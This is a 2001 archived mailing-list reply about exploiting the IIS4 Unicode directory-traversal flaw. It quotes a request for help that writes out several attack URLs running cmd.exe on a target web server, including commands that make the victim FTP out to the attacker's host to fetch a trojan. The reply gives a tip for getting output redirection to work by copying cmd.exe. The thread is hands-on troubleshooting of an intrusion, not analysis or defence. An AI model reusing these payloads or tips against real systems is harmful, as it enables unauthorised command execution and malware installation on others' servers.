Vulnerability Development mailing list archives
Re: unicode / iis4
From: Optical <optical () EQUILAN NET>
Date: Sat, 6 Jan 2001 22:20:19 -0600
I'm not exactlly sure but I believe that the redirection problem was figured out months ago. If I remember correctly you need to copy cmd.exe to something like cmd2.exe before you are able to do redirections and such. And it would also be easier if you copied cmd.exe to something like c:\cmd2.exe so that you have less stuff to type in ;). ----- Original Message ----- From: Mad Zigy <zigy () GLOBAL CO ZA> To: <VULN-DEV () SECURITYFOCUS COM> Sent: Saturday, January 06, 2001 9:59 AM Subject: unicode / iis4
Well i have been able to use msadc2.pl yet the commands i give do not work. so i tried the other way by doing http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test .txt and all it did was say: The parameter is incorrect. so then i though maybe we cant have a > in the string so i found the hex of it and tried http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+echo+test+% 3e+c:\test.txt yet it still gave me the same: The parameter is incorrect. I have been able to make it ftp into my pc by http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+ftp+hostname but i cant make it login as i need to echo a script which i can run http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+ftp+- s:c:\ftp.txt+hostname so that it will login and download the exe / trojan Thankz zigy!
Current thread:
- unicode / iis4 Mad Zigy (Jan 06)
- Re: unicode / iis4 Optical (Jan 07)
- Re: unicode / iis4 Dave Loschiavo (Jan 07)